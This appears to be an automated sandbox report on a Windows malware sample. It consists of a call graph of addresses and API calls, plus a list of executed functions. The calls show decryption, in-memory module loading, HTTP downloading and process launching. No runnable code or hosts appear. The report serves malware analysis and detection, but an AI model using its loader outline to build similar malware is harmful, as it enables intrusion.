41588->41606 42615 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41589->42615 41593 406906 41592->41593 41599 408e70 43 API calls 41593->41599 41595 406548 41601 402360 39 API calls 41595->41601 41602 4063d5 41596->41602 41597 406855 41603 402360 39 API calls 41597->41603 41708 406283 41597->41708 41604 40648a 41598->41604 41605 40691b 41599->41605 41600 406633 41607 402360 39 API calls 41600->41607 41608 406550 41601->41608 41602->41708 42592 4071e0 53 API calls 2 library calls 41602->42592 41603->41708 41609 406498 41604->41609 41610 40648e 41604->41610 41611 408dc0 43 API calls 41605->41611 41612 4066bc 41606->41612 41613 40663b 41607->41613 42607 407780 53 API calls 2 library calls 41608->42607 42600 4074f0 53 API calls 2 library calls 41609->42600 42599 407470 53 API calls 2 library calls 41610->42599 41618 406933 41611->41618 41619 4066c0 41612->41619 41620 40673e 41612->41620 42616 407b30 53 API calls 2 library calls 41613->42616 41624 408e70 43 API calls 41618->41624 42621 407cd0 53 API calls 2 library calls 41619->42621 42627 407e50 53 API calls 2 library calls 41620->42627 41622 406555 41631 402430 43 API calls 41622->41631 41623 40649d 41632 402430 43 API calls 41623->41632 41628 406948 41624->41628 41627 406640 41635 402430 43 API calls 41627->41635 41630 408dc0 43 API calls 41628->41630 41629 406743 41639 402430 43 API calls 41629->41639 41633 406960 41630->41633 41636 406565 41631->41636 41637 4064ad 41632->41637 41638 402360 39 API calls 41633->41638 41634 4066c5 41640 402430 43 API calls 41634->41640 41641 406650 41635->41641 42608 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41636->42608 41648 402360 39 API calls 41637->41648 41644 406753 41639->41644 41645 4066d5 41640->41645 42617 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41641->42617 41659 402360 39 API calls 41644->41659 42622 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41645->42622 41647 40656e 41652 402360 39 API calls 41647->41652 41653 4064c1 41648->41653 41651 406659 41656 402360 39 API calls 41651->41656 41657 406576 41652->41657 41653->41708 42601 407580 53 API calls 2 library calls 41653->42601 41655 4066de 41660 402360 39 API calls 41655->41660 41661 406661 41656->41661 42609 407800 53 API calls 2 library calls 41657->42609 41665 406767 41659->41665 41666 4066e6 41660->41666 42618 407bc0 53 API calls 2 library calls 41661->42618 41671 40676b 41665->41671 41672 4067be 41665->41672 42623 407d50 53 API calls 2 library calls 41666->42623 41668 40657b 41682 402430 43 API calls 41668->41682 42602 407600 53 API calls 2 library calls 41669->42602 42628 407ee0 53 API calls 2 library calls 41671->42628 42633 408060 53 API calls 2 library calls 41672->42633 41674 406666 41678 4066eb 41687 402430 43 API calls 41678->41687 41679 4067c3 41689 402430 43 API calls 41679->41689 41681 406770 41691 402430 43 API calls 41681->41691 41692 4066fb 41687->41692 41694 4067d3 41689->41694 41696 406780 41691->41696 42629 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41696->42629 41708->41502 42640 402330 43 API calls 41708->42640 42613 407a20 53 API calls 2 library calls 41748->42613 42639 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41764->42639 41824->41449 41825->41449 41828->40269 41829->40269 41830->40269 41832 409358 41831->41832 41835 4092ea __InternalCxxFrameHandler 41831->41835 42668 409590 43 API calls 4 library calls 41832->42668 41834 40936a 41834->40269 41835->40269 41837 401e70 41836->41837 41837->41837 41838 402730 43 API calls 41837->41838 41839 401e83 41838->41839 41840 402730 43 API calls 41839->41840 41841 401fc1 __InternalCxxFrameHandler 41840->41841 42669 40d0b0 41841->42669 41844 402169 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41845 4099d7 CatchGuardHandler 5 API calls 41844->41845 41847 40218d 41845->41847 41846 4020f9 41846->41844 41848 402198 41846->41848 41847->40269 41849 40cfaf 39 API calls 41848->41849 41850 40219d 41849->41850 41851 401e20 43 API calls 41850->41851 41852->40286 41854->40268 41855->40287 41856->40304 41857->40324 41858->40338 41859->40266 41860->40283 41861->40305 41862->40321 41863->40338 41864->40260 41865->40297 41866->40314 41867->40330 41868->40350 41869->40364 41870->40404 41871->40403 41872->40404 41873->40299 41874->40335 41875->40352 41876->40366 41877->40385 41878->40407 41879->40404 41880->40463 41881->40327 41882->40336 41883->40371 41884->40390 41885->40409 41886->40436 41887->40462 41888->40483 41889->40504 41890->40547 41891->40554 41892->40363 41893->40370 41894->40414 41895->40440 41896->40467 41897->40492 41898->40510 41899->40536 41900->40413 41901->40470 41902->40496 41903->40516 41904->40541 41905->40558 41906->40572 41907->40469 41908->40519 41909->40545 41910->40560 41911->40576 41912->40594 41913->40521 41914->40561 41915->40581 41916->40591 41917->40605 41918->40594 41919->40438 41920->40340 41921->40616 41922->40628 41924->40625 41925->40637 41926->40649 41927->40655 41928->40659 41930 41066b 21 API calls 41929->41930 41931 403c27 41930->41931 41933 4128b8 41932->41933 41938 4128be 41932->41938 41961 413566 6 API calls _unexpected 41933->41961 41936 4128da 41937 4128c2 41936->41937 41939 4128e2 41936->41939 41940 412947 SetLastError 41937->41940 41938->41937 41962 4135a5 6 API calls _unexpected 41938->41962 41963 413254 14 API calls 2 library calls 41939->41963 41943 405a88 Sleep 41940->41943 41944 412957 41940->41944 41942 4128ef 41945 4128f7 41942->41945 41946 412908 41942->41946 41943->40234 41974 4110c9 39 API calls CallUnexpected 41944->41974 41964 4135a5 6 API calls _unexpected 41945->41964 41965 4135a5 6 API calls _unexpected 41946->41965 41951 412905 41967 4132b1 41951->41967 41952 412914 41953 412918 41952->41953 41954 41292f 41952->41954 41966 4135a5 6 API calls _unexpected 41953->41966 41973 4126d0 14 API calls _unexpected 41954->41973 41958 41292c 41958->41940 41959 41293a 41960 4132b1 ___free_lconv_mon 14 API calls 41959->41960 41960->41958 41961->41938 41962->41936 41963->41942 41964->41951 41965->41952 41966->41951 41968 4132bc RtlFreeHeap 41967->41968 41972 4132e6 41967->41972 41969 4132d1 GetLastError 41968->41969 41968->41972 41970 4132de __dosmaperr 41969->41970 41975 40d09d 14 API calls __dosmaperr 41970->41975 41972->41958 41973->41959 41975->41972 41976->40667 41977->40674 41978->40686 41979->40688 41980->40690 41981->40711 41982->40714 41983->40716 41984->40721 41985->40724 41986->40726 41987->40732 41988->40734 41989->40736 41990->40743 41992 409133 41991->41992 41993 409138 __InternalCxxFrameHandler 41992->41993 41994 4092bd 41992->41994 41995 4091fd 41992->41995 41993->40747 42010 4015d0 43 API calls 3 library calls 41994->42010 41998 409232 41995->41998 41999 409258 41995->41999 41997 4092c2 42011 401530 41 API calls 2 library calls 41997->42011 41998->41997 42001 40923d 41998->42001 42007 40924a __InternalCxxFrameHandler 41999->42007 42009 401530 41 API calls 3 library calls 41999->42009 42008 401530 41 API calls 3 library calls 42001->42008 42002 409243 42005 40cfaf 39 API calls 42002->42005 42002->42007 42006 4092cc 42005->42006 42007->40747 42008->42002 42009->42007 42010->41997 42011->42002 42012->40763 42013->40764 42014->40753 42015->40763 42020 40248e __InternalCxxFrameHandler 42016->42020 42021 4024b4 42016->42021 42017 402594 42247 4015d0 43 API calls 3 library calls 42017->42247 42019 402599 42248 401530 41 API calls 2 library calls 42019->42248 42020->40777 42021->42017 42022 402523 42021->42022 42023 4024ef 42021->42023 42029 40250f __InternalCxxFrameHandler 42022->42029 42246 401530 41 API calls 3 library calls 42022->42246 42023->42019 42245 401530 41 API calls 3 library calls 42023->42245 42026 40259e 42028 40cfaf 39 API calls 42028->42017 42029->42028 42030 402576 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42029->42030 42030->40777 42032 4036fa GetLastError CryptReleaseContext 42031->42032 42033 40363e CryptCreateHash 42031->42033 42034 403844 42032->42034 42033->42032 42035 403662 42033->42035 42036 40386a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42034->42036 42038 403892 42034->42038 42039 409b4a 41 API calls 42035->42039 42037 4099d7 CatchGuardHandler 5 API calls 42036->42037 42040 40388e 42037->42040 42041 40cfaf 39 API calls 42038->42041 42042 40369a 42039->42042 42040->40793 42048 403897 42041->42048 42249 40fcdf 42042->42249 42045 4036d6 CryptDeriveKey 42045->42032 42047 403715 42045->42047 42046 4036c8 GetLastError 42046->42034 42049 40fb0d ___std_exception_copy 15 API calls 42047->42049 42048->40793 42050 40371b __InternalCxxFrameHandler 42049->42050 42051 409b4a 41 API calls 42050->42051 42054 40373a __InternalCxxFrameHandler 42051->42054 42052 403838 CryptDestroyKey 42052->42034 42053 4037ac CryptDecrypt 42053->42052 42053->42054 42054->42052 42054->42053 42056 402ee0 SetLastError 42055->42056 42057 402f08 42055->42057 42304 4029f0 70 API calls 42056->42304 42058 402f12 42057->42058 42061 402f49 SetLastError 42057->42061 42076 402f71 42057->42076 42305 4029f0 70 API calls 42058->42305 42060 402ef2 42062 4099d7 CatchGuardHandler 5 API calls 42060->42062 42306 4029f0 70 API calls 42061->42306 42065 402f04 42062->42065 42065->40793 42066 402f1c SetLastError 42068 4099d7 CatchGuardHandler 5 API calls 42066->42068 42067 402f5b 42069 4099d7 CatchGuardHandler 5 API calls 42067->42069 42071 402f39 42068->42071 42072 402f6d 42069->42072 42070 402fe7 GetNativeSystemInfo 42070->42058 42073 403016 VirtualAlloc 42070->42073 42071->40793 42072->40793 42074 403030 VirtualAlloc 42073->42074 42075 403056 HeapAlloc 42073->42075 42074->42075 42077 403042 42074->42077 42081 403077 VirtualFree 42075->42081 42082 40308b 42075->42082 42076->42058 42076->42070 42307 4029f0 70 API calls 42077->42307 42080 40304c 42080->42075 42081->42082 42083 4030d7 SetLastError 42082->42083 42084 40316f VirtualAlloc 42082->42084 42085 4030df 42083->42085 42089 40318a __InternalCxxFrameHandler CallUnexpected 42084->42089 42308 40fab8 42085->42308 42088 403132 HeapFree 42095 4099d7 CatchGuardHandler 5 API calls 42088->42095 42089->42083 42089->42085 42091 40326a 42089->42091 42288 402e30 VirtualAlloc 42089->42288 42289 402cd0 42091->42289 42092 40330c 42092->42085 42297 402b50 42092->42297 42093 40fab8 ___std_exception_copy 14 API calls 42093->42088 42097 40316b 42095->42097 42097->40793 42098 40331b 42098->42085 42101 403323 42098->42101 42099 4033aa 42102 4099d7 CatchGuardHandler 5 API calls 42099->42102 42100 40335a 42103 403394 42100->42103 42104 403365 42100->42104 42101->42099 42101->42100 42105 4033c0 42102->42105 42106 4099d7 CatchGuardHandler 5 API calls 42103->42106 42108 4099d7 CatchGuardHandler 5 API calls 42104->42108 42105->40793 42107 4033a6 42106->42107 42107->40793 42109 403390 42108->42109 42109->40793 42112 100010ad 42111->42112 42113 100010bd CoUninitialize 42112->42113 42328 10005956 GetSystemTimeAsFileTime 42114->42328 42116 10001f48 42330 100059d5 42116->42330 42118 10001f4f 42333 10001523 42118->42333 42120 10002174 42121 100010a3 CoUninitialize 42120->42121 42123 10002188 42121->42123 42375 100026ff 42123->42375 42125 10002025 42363 10001cdd 44 API calls __EH_prolog3_GS 42125->42363 42126 1000219b 42126->40873 42128 1000202e 42156 10002164 42128->42156 42364 100059b4 27 API calls _unexpected 42128->42364 42130 10001bb9 15 API calls 42132 10002172 42130->42132 42131 10002040 42365 10001c33 29 API calls 42131->42365 42132->42120 42134 10002052 42366 10002493 17 API calls __InternalCxxFrameHandler 42134->42366 42136 1000205f 42367 10002230 17 API calls __InternalCxxFrameHandler 42136->42367 42138 10002079 42368 10002230 17 API calls __InternalCxxFrameHandler 42138->42368 42140 1000209f 42369 1000219f 17 API calls __InternalCxxFrameHandler 42140->42369 42142 100020a9 42370 10001bb9 42142->42370 42145 10001bb9 15 API calls 42146 100020bb 42145->42146 42147 10001bb9 15 API calls 42146->42147 42148 100020c4 42147->42148 42374 10001725 8 API calls __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 42148->42374 42150 100020df 42151 10002100 CreateProcessA 42150->42151 42152 10002135 42151->42152 42153 1000213c ShellExecuteA 42151->42153 42152->42153 42154 1000215b 42152->42154 42153->42154 42155 10001bb9 15 API calls 42154->42155 42155->42156 42156->42130 42157->40777 42158->40777 42159->40777 42160->40793 42161->40793 42162->40793 42165->40851 42166->40851 42167->40851 42168->40869 42170->40850 42171->40870 42172->40889 42173->40910 42174->40924 42175->40848 42176->40866 42177->40891 42178->40907 42179->40924 42180->40842 42181->40882 42182->40900 42183->40916 42184->40936 42185->40950 42186->40990 42187->40989 42188->40990 42189->40884 42190->40921 42191->40938 42192->40952 42193->40971 42194->40993 42195->40990 42196->41049 42197->40913 42198->40922 42199->40957 42200->40976 42201->40995 42202->41022 42203->41048 42204->41069 42205->41090 42206->41133 42207->41140 42208->40949 42209->40956 42210->41000 42211->41026 42212->41053 42213->41078 42214->41096 42215->41122 42216->40999 42217->41056 42218->41082 42219->41102 42220->41127 42221->41144 42222->41158 42223->41055 42224->41105 42225->41131 42226->41146 42227->41162 42228->41180 42229->41107 42230->41147 42231->41167 42232->41177 42233->41191 42234->41180 42235->41024 42236->40926 42245->42029 42246->42029 42247->42019 42248->42026 42250 40fcf2 __cftof 42249->42250 42255 40fb18 42250->42255 42256 40fb4e 42255->42256 42257 40fb62 42256->42257 42259 40fb86 42256->42259 42267 40fb7b 42256->42267 42280 40cf22 39 API calls __cftof 42257->42280 42265 40fb96 42259->42265 42281 40f660 39 API calls 2 library calls 42259->42281 42261 40fbc6 42263 40fbd4 42261->42263 42264 40fc8c 42261->42264 42262 40fba8 42282 414d57 5 API calls ___scrt_uninitialize_crt 42262->42282 42263->42267 42283 414cbe MultiByteToWideChar ___scrt_uninitialize_crt 42263->42283 42264->42267 42285 414cbe MultiByteToWideChar ___scrt_uninitialize_crt 42264->42285 42265->42261 42265->42262 42274 40ccdb 42267->42274 42270 40fc0a 42270->42267 42271 40fc15 GetLastError 42270->42271 42271->42267 42273 40fc35 42271->42273 42273->42267 42284 414cbe MultiByteToWideChar ___scrt_uninitialize_crt 42273->42284 42275 40cce7 42274->42275 42278 40ccfe 42275->42278 42286 40cd86 39 API calls 2 library calls 42275->42286 42277 4036ac CryptHashData 42277->42045 42277->42046 42278->42277 42287 40cd86 39 API calls 2 library calls 42278->42287 42280->42267 42281->42265 42282->42267 42283->42270 42284->42267 42285->42267 42286->42278 42287->42277 42288->42089 42290 402e22 42289->42290 42293 402cf0 42289->42293 42290->42092 42291 402e11 SetLastError 42291->42092 42292 402df4 SetLastError 42292->42092 42293->42290 42293->42291 42293->42292 42295 402dd5 SetLastError 42293->42295 42295->42092 42302 402b83 42297->42302 42298 402ca2 42299 402a20 52 API calls 42298->42299 42300 402cb4 42299->42300 42300->42098 42302->42298 42303 402c99 42302->42303 42311 402a20 42302->42311 42303->42098 42304->42060 42305->42066 42306->42067 42307->42080 42309 4132b1 ___free_lconv_mon 14 API calls 42308->42309 42310 4030fe 42309->42310 42310->42088 42310->42093 42312 402a39 42311->42312 42321 402a75 42311->42321 42313 402a8e VirtualProtect 42312->42313 42317 402a44 42312->42317 42316 402ad2 GetLastError FormatMessageA 42313->42316 42313->42321 42314 4099d7 CatchGuardHandler 5 API calls 42315 402a8a 42314->42315 42315->42302 42318 402af7 42316->42318 42317->42321 42326 402e50 VirtualFree 42317->42326 42318->42318 42319 402afe LocalAlloc 42318->42319 42327 4029b0 44 API calls 42319->42327 42321->42314 42322 402b21 OutputDebugStringA LocalFree LocalFree 42323 4099d7 CatchGuardHandler 5 API calls 42322->42323 42324 402b47 42323->42324 42324->42302 42326->42321 42327->42322 42329 10005988 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 42328->42329 42329->42116 42382 10006e9c GetLastError 42330->42382 42334 1000152f __EH_prolog3_GS 42333->42334 42415 1000184b 42334->42415 42337 10001593 42419 1000190a 42337->42419 42338 100015ff 42424 1000179a 42338->42424 42340 10001541 42340->42337 42346 1000179a 17 API calls 42340->42346 42341 1000160d 42429 10005939 42341->42429 42344 10001650 InternetSetOptionA InternetConnectA 42348 10001692 HttpOpenRequestA 42344->42348 42349 100016e8 InternetCloseHandle 42344->42349 42345 100016eb 42347 10001704 42345->42347 42478 10001bdc 15 API calls 42345->42478 42346->42337 42351 10001bb9 15 API calls 42347->42351 42352 100016e2 InternetCloseHandle 42348->42352 42353 100016bc 42348->42353 42349->42345 42354 1000171b 42351->42354 42352->42349 42432 100010c7 42353->42432 42479 1000e8a5 42354->42479 42359 100016d3 42446 10001175 42359->42446 42360 100016df InternetCloseHandle 42360->42352 42363->42128 42364->42131 42365->42134 42366->42136 42367->42138 42368->42140 42369->42142 42371 10001bc4 42370->42371 42372 10001bcc 42370->42372 42522 10001bdc 15 API calls 42371->42522 42372->42145 42374->42150 42376 10002707 42375->42376 42377 10002708 IsProcessorFeaturePresent 42375->42377 42376->42126 42379 10002b1c 42377->42379 42523 10002adf SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 42379->42523 42381 10002bff 42381->42126 42383 10006eb3 42382->42383 42384 10006eb9 42382->42384 42407 10007580 6 API calls _unexpected 42383->42407 42388 10006ebf SetLastError 42384->42388 42408 100075bf 6 API calls _unexpected 42384->42408 42387 10006ed7 42387->42388 42389 10006edb 42387->42389 42395 10006f53 42388->42395 42396 100059df 42388->42396 42409 10007aa7 12 API calls 2 library calls 42389->42409 42391 10006ee7 42393 10006f06 42391->42393 42394 10006eef 42391->42394 42411 100075bf 6 API calls _unexpected 42393->42411 42410 100075bf 6 API calls _unexpected 42394->42410 42414 10006928 27 API calls CallUnexpected 42395->42414 42396->42118 42401 10006f12 42402 10006f16 42401->42402 42403 10006f27 42401->42403 42412 100075bf 6 API calls _unexpected 42402->42412 42413 10006c9e EnterCriticalSection LeaveCriticalSection _unexpected 42403->42413 42406 10006efd 42406->42388 42407->42384 42408->42387 42409->42391 42410->42406 42411->42401 42412->42406 42413->42406 42416 10001868 42415->42416 42416->42416 42417 1000190a 17 API calls 42416->42417 42418 1000187c 42417->42418 42418->42340 42420 10001978 42419->42420 42423 10001920 __InternalCxxFrameHandler 42419->42423 42482 10001a59 17 API calls std::_Xinvalid_argument 42420->42482 42423->42338 42425 100017eb 42424->42425 42428 100017b3 __InternalCxxFrameHandler 42424->42428 42483 10001884 17 API calls 42425->42483 42428->42341 42484 100070ee 42429->42484 42433 100010d3 __EH_prolog3_GS 42432->42433 42434 1000184b 17 API calls 42433->42434 42435 100010e3 HttpAddRequestHeadersA 42434->42435 42510 100017f1 42435->42510 42437 10001112 HttpAddRequestHeadersA 42438 100017f1 17 API calls 42437->42438 42439 10001132 HttpAddRequestHeadersA 42438->42439 42440 100017f1 17 API calls 42439->42440 42441 10001152 HttpAddRequestHeadersA 42440->42441 42442 10001bb9 15 API calls 42441->42442 42443 1000116d 42442->42443 42444 1000e8a5 5 API calls 42443->42444 42445 10001172 HttpSendRequestA 42444->42445 42445->42359 42445->42360 42447 10001184 __EH_prolog3_GS 42446->42447 42448 100011c5 InternetSetFilePointer 42447->42448 42449 100011e3 InternetReadFile 42448->42449 42451 1000121d __InternalCxxFrameHandler 42449->42451 42450 10001260 42452 1000127d HttpQueryInfoA 42450->42452 42451->42449 42451->42450 42453 100012a6 CoCreateInstance 42452->42453 42454 1000150a 42452->42454 42453->42454 42455 100012d8 42453->42455 42456 1000e8a5 5 API calls 42454->42456 42455->42454 42458 1000184b 17 API calls 42455->42458 42457 10001520 42456->42457 42457->42360 42459 100012f7 42458->42459 42515 10001006 20 API calls 42459->42515 42461 1000130c 42462 10001bb9 15 API calls 42461->42462 42464 1000134f 42462->42464 42463 100014ae __InternalCxxFrameHandler 42463->42454 42464->42463 42470 10001427 __InternalCxxFrameHandler 42464->42470 42472 10001456 42464->42472 42473 10001449 42464->42473 42465 1000149d 42519 10005926 12 API calls __dosmaperr 42465->42519 42467 100014aa 42467->42463 42520 10005926 12 API calls __dosmaperr 42467->42520 42468 100014a2 42521 1000584c 15 API calls __strnicoll 42468->42521 42470->42463 42470->42465 42470->42467 42472->42470 42517 10005926 12 API calls __dosmaperr 42472->42517 42516 10005926 12 API calls __dosmaperr 42473->42516 42475 1000144e 42518 1000584c 15 API calls __strnicoll 42475->42518 42478->42347 42480 100026ff __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 42479->42480 42481 10001722 42480->42481 42481->42120 42481->42125 42488 10007102 42484->42488 42485 10007106 42486 10001629 InternetOpenA 42485->42486 42503 10005926 12 API calls __dosmaperr 42485->42503 42486->42344 42486->42345 42488->42485 42488->42486 42490 10007140 42488->42490 42489 10007130 42504 1000584c 15 API calls __strnicoll 42489->42504 42505 100069d1 27 API calls 2 library calls 42490->42505 42493 1000714c 42494 10007156 42493->42494 42497 1000716d 42493->42497 42506 1000a31e 15 API calls 2 library calls 42494->42506 42496 100071ef 42496->42486 42507 10005926 12 API calls __dosmaperr 42496->42507 42497->42496 42498 10007244 42497->42498 42498->42486 42509 10005926 12 API calls __dosmaperr 42498->42509 42501 10007238 42508 1000584c 15 API calls __strnicoll 42501->42508 42503->42489 42504->42486 42505->42493 42506->42486 42507->42501 42508->42486 42509->42486 42511 100017ff 42510->42511 42511->42511 42512 1000180d __InternalCxxFrameHandler 42511->42512 42514 1000188f 17 API calls __InternalCxxFrameHandler 42511->42514 42512->42437 42514->42512 42515->42461 42516->42475 42517->42475 42518->42470 42519->42468 42520->42468 42521->42463 42522->42372 42523->42381 42525 4128a2 _unexpected 39 API calls 42524->42525 42526 410686 42525->42526 42526->41261 42649 408a70 42527->42649 42529 403ca2 42530 403d02 42529->42530 42531 410681 39 API calls 42529->42531 42663 408fb0 43 API calls 3 library calls 42529->42663 42530->41261 42531->42529 42534 40226b 42533->42534 42535 40220d 42533->42535 42537 4099d7 CatchGuardHandler 5 API calls 42534->42537 42535->42534 42536 402213 CreateFileA 42535->42536 42536->42534 42538 402233 WriteFile CloseHandle 42536->42538 42539 402279 42537->42539 42540 4099d7 CatchGuardHandler 5 API calls 42538->42540 42539->41301 42541 402265 42540->42541 42541->41301 42542->41269 42543->41274 42544->41271 42545->41282 42546->41290 42547->41284 42548->41319 42549->41328 42550->41321 42551->41339 42552->41347 42553->41343 42554->41375 42555->41388 42556->41379 42557->41406 42558->41421 42559->41427 42560->41411 42561->41297 42562->41297 42563->41297 42564->41381 42565->41381 42566->41381 42569->41419 42570->41419 42571->41419 42572->41444 42574->41423 42575->41445 42576->41466 42577->41487 42578->41708 42579->41420 42580->41441 42581->41468 42582->41485 42583->41708 42584->41407 42585->41458 42586->41478 42587->41493 42588->41512 42589->41525 42590->41566 42591->41564 42592->41566 42593->41455 42594->41500 42595->41514 42596->41526 42597->41544 42598->41565 42599->41566 42600->41623 42601->41669 42602->41498 42603->41532 42604->41551 42605->41570 42606->41595 42607->41622 42608->41647 42609->41668 42613->41531 42614->41575 42615->41600 42616->41627 42617->41651 42618->41674 42620->41574 42621->41634 42622->41655 42623->41678 42627->41629 42628->41681 42633->41679 42639->41597 42640->41502 42651 408a8b 42649->42651 42662 408b74 __InternalCxxFrameHandler std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42649->42662 42650 408c01 42666 4015d0 43 API calls 3 library calls 42650->42666 42651->42650 42654 408afa 42651->42654 42656 408b21 42651->42656 42661 408b0b __InternalCxxFrameHandler 42651->42661 42651->42662 42653 408c06 42667 401530 41 API calls 2 library calls 42653->42667 42654->42653 42664 401530 41 API calls 3 library calls 42654->42664 42656->42661 42665 401530 41 API calls 3 library calls 42656->42665 42657 408c0b 42660 40cfaf 39 API calls 42660->42650 42661->42660 42661->42662 42662->42529 42663->42529 42664->42661 42665->42661 42666->42653 42667->42657 42668->41834 42672 412b8d 42669->42672 42675 412ba1 42672->42675 42673 412ba5 42690 40200e InternetOpenA 42673->42690 42691 40d09d 14 API calls __dosmaperr 42673->42691 42675->42673 42677 412bdf 42675->42677 42675->42690 42676 412bcf 42692 40cf9f 39 API calls __cftof 42676->42692 42693 40d0cd 39 API calls 2 library calls 42677->42693 42680 412beb 42681 412bf5 42680->42681 42686 412c0c 42680->42686 42694 4193d9 39 API calls 2 library calls 42681->42694 42683 412cee 42683->42690 42697 40d09d 14 API calls __dosmaperr 42683->42697 42685 412c96 42685->42690 42695 40d09d 14 API calls __dosmaperr 42685->42695 42686->42683 42686->42685 42688 412ce2 42696 40cf9f 39 API calls __cftof 42688->42696 42690->41846 42691->42676 42692->42690 42693->42680 42694->42690 42695->42688 42696->42690 42697->42690 42699 4104cc 42698->42699 42700 4104de 42698->42700 42725 40a69e GetModuleHandleW 42699->42725 42710 410330 42700->42710 42703 4104d1 42703->42700 42726 410580 GetModuleHandleExW 42703->42726 42705 40a1e4 42705->40214 42711 41033c ___scrt_is_nonwritable_in_current_image 42710->42711 42732 41088b EnterCriticalSection 42711->42732 42713 410346 42733 4103b7 42713->42733 42715 410353 42737 410371 42715->42737 42718 410536 42742 410567 42718->42742 42720 410540 42721 410554 42720->42721 42722 410544 GetCurrentProcess TerminateProcess 42720->42722 42723 410580 CallUnexpected 3 API calls 42721->42723 42722->42721 42724 41055c ExitProcess 42723->42724 42725->42703 42727 4105e0 42726->42727 42728 4105bf GetProcAddress 42726->42728 42730 4105e6 FreeLibrary 42727->42730 42731 4104dd 42727->42731 42728->42727 42729 4105d3 42728->42729 42729->42727 42730->42731 42731->42700 42732->42713 42734 4103c3 ___scrt_is_nonwritable_in_current_image CallUnexpected 42733->42734 42736 410427 CallUnexpected 42734->42736 42740 411fe5 14 API calls 2 library calls 42734->42740 42736->42715 42741 4108d3 LeaveCriticalSection 42737->42741 42739 41035f 42739->42705 42739->42718 42740->42736 42741->42739 42745 414fe9 5 API calls CallUnexpected 42742->42745 42744 41056c CallUnexpected 42744->42720 42745->42744 42746 f4c95e 42747 f4c96d 42746->42747 42750 f4d0fe 42747->42750 42752 f4d119 42750->42752 42751 f4d122 CreateToolhelp32Snapshot 42751->42752 42753 f4d13e Module32First 42751->42753 42752->42751 42752->42753 42754 f4c976 42753->42754 42755 f4d14d 42753->42755 42757 f4cdbd 42755->42757 42758 f4cde8 42757->42758 42759 f4cdf9 VirtualAlloc 42758->42759 42760 f4ce31 42758->42760 42759->42760 42761 9b60c0 42762 9b96da LoadLibraryA 42761->42762 42764 9b9cd2 42762->42764 42765 4d1003c 42766 4d10049 42765->42766 42780 4d10e0f SetErrorMode SetErrorMode 42766->42780 42771 4d10265 42772 4d102ce VirtualProtect 42771->42772 42774 4d1030b 42772->42774 42773 4d10439 VirtualFree 42778 4d105f4 LoadLibraryA 42773->42778 42779 4d104be 42773->42779 42774->42773 42775 4d104e3 LoadLibraryA 42775->42779 42777 4d108c7 42778->42777 42779->42775 42779->42778 42781 4d10223 42780->42781 42782 4d10d90 42781->42782 42783 4d10dad 42782->42783 42784 4d10dbb GetPEB 42783->42784 42785 4d10238 VirtualAlloc 42783->42785 42784->42785 42785->42771 42786 100079ee 42787 10007a2c 42786->42787 42792 100079fc _unexpected 42786->42792 42794 10005926 12 API calls __dosmaperr 42787->42794 42789 10007a17 RtlAllocateHeap 42790 10007a2a 42789->42790 42789->42792 42792->42787 42792->42789 42793 10005aed EnterCriticalSection LeaveCriticalSection _unexpected 42792->42793 42793->42792 42794->42790

                                            Executed Functions

                                            Function 00403D20 Relevance: 56.1, APIs: 25, Strings: 6, Instructions: 1839sleepcomCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetTempPathA.KERNEL32(00000104,?,92291A76,74DF0F00,00000000), ref: 00403D8A
                                            • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?), ref: 00403F19
                                            • Sleep.KERNEL32(000003E8), ref: 00403F22
                                            • __Init_thread_footer.LIBCMT ref: 004044F7
                                            • __Init_thread_footer.LIBCMT ref: 004046BD
                                            • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,00000000,?,00406AA1,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D), ref: 004048C7
                                            • __Init_thread_footer.LIBCMT ref: 00404955
                                            • __Init_thread_footer.LIBCMT ref: 00404BBE
                                            • CoInitialize.OLE32(00000000), ref: 00404C3F
                                            • CoCreateInstance.OLE32(0041F290,00000000,00000001,0041F260,?,?,00406AA1,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D), ref: 00404C5A
                                            • __Init_thread_footer.LIBCMT ref: 004050BD
                                            • Sleep.KERNEL32(00000BB8,00000000,?,00406A81,0041D8A0,0042DB20,0042DB21), ref: 004052D5
                                            • __Init_thread_footer.LIBCMT ref: 004053CB
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,?,00406AA1,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D), ref: 00404CC8
                                              • Part of subcall function 004107E2: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A7F,00000000,92291A76), ref: 004107F7
                                              • Part of subcall function 004107E2: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410816
                                            • CoUninitialize.COMBASE(?,00406AA1,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D,?,?,?,?,00000000,0042DA28), ref: 00404D01
                                            • CoUninitialize.OLE32(?,?,0042DC1D,?,?,?,?,00000000,0042DA28,0042DA29), ref: 00404DC4
                                            • CoUninitialize.OLE32(?,?,?,?,?,0042DC1D,?,?,?,?,00000000,0042DA28,0042DA29), ref: 00404E45
                                            • __Init_thread_footer.LIBCMT ref: 00404026
                                              • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
